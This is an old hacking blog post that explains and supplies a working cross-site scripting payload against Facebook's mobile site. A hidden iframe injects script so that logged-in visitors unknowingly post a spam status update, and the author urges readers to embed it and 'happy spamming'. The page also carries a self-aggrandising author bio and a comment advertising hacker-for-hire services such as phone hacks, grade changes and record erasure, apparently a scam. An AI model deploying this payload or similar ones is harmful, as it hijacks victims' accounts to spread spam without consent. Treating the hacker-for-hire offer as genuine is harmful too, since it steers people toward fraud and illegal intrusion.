hahahah amol hacked ur ip address

Sign by Danasoft - For Backgrounds and Layouts

Author

Amol Bhure (ultra l33t) was born in Maharashtra, Seventh July Of Nineteen Hundred Nineteen Ninety A.D. He's currently pursuing his B.E in Bangalore. A cyber Security Professional, Hacker, Designer, Programmer. Keen interest in hacking and network security and he developed several techniques of defending and defacing websites. He's of the opinion that people should learn this art to prevent any cyber attacks. Currently Amol works as a member of 'Null International', Bangalore chapter as a network security guy. Apart from this, he has done internships at YAHOO! India, AMAZON India, etc. He has also attended various International conferences like NullCon GOA, c0c0n, ClubHack, Defcon , SecurityByte, ICFoCS, OWASP, etc.. He is certified with RHCE, LPT, CEH v7, SCJP, AFCEH. In programming he knows stuffs on C, C++, C# , JAVA (SCJP), .NET , and PHP. Additionally he knows few hardware languages like HDL, VHDL, Verilog, Embedded Micro controller Programming. He has been featured on google hall of fame. Amol was named a "India's top 10 hacker" by google. "World's top 50 hacking blog" by google.

Daily Page Views

Friday, April 15, 2011

Autopost Spamming using Facebook Mobile XSS



@amol: What has happened out there really pushes me to share this out. I call this an Autopost Spamming using Facebook Mobile XSS. I dont care anymore if this one will be filtered, the faster they fix it, the better. People dont seem to care how hard i tried to hide this code from facebook team. frankly, i also use this to post spam with link to this blog, but it only affects indonesian ip + with a custom interval. So people outside indonesia wont be able to see this. Too bad it’s now spread like a worm everywhere wide open without any source code protection....@mol
Nevermind, it’s no use to complain about what has happened anyway. Let’s talk about this in details. This is about how to make an autopost status update to people’s facebook profile. This method uses XSS vulnerability of prompt_feed.php from m.facebook.com. When people see our page with this evil code, they will automatically post a status update with any message we want.
Below is the iframe HTML source code :


<iframe id="amol-hackinglibrary" style="display:none;" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='Just visited http://tinyurl.com/ultral33t-amol Wow.. amol cool! nice page dude!!!';document.forms[0].submit();}</script>"></iframe>


Put the code above on your website, change the red code with your own message. Whenever facebook logged in users see your page the message will be posted automatically to their wall.
That’s all. Happy spamming :(


@mol



Posted by Amol S Bhure at 5:44 PM
Labels: ,

2 comments:

Unknown said...

good amol

April 16, 2011 at 12:27 AM
jane holly said...

This professional hacker is absolutely reliable and I strongly recommend him for any type of hack you require. I know this because I have hired him severally for various hacks and he has never disappointed me nor any of my friends who have hired him too, he can help you with any of the following hacks:

-Phone hacks (remotely)
-Credit repair
-Bitcoin recovery (any cryptocurrency)
-Make money from home (USA only)
-Social media hacks
-Website hacks
-Erase criminal records (USA & Canada only)
-Grade change
-funds recovery

Email: onlineghosthacker247@ gmail .com

November 21, 2020 at 5:06 PM

Post a Comment

Subscribe to: Post Comments (Atom)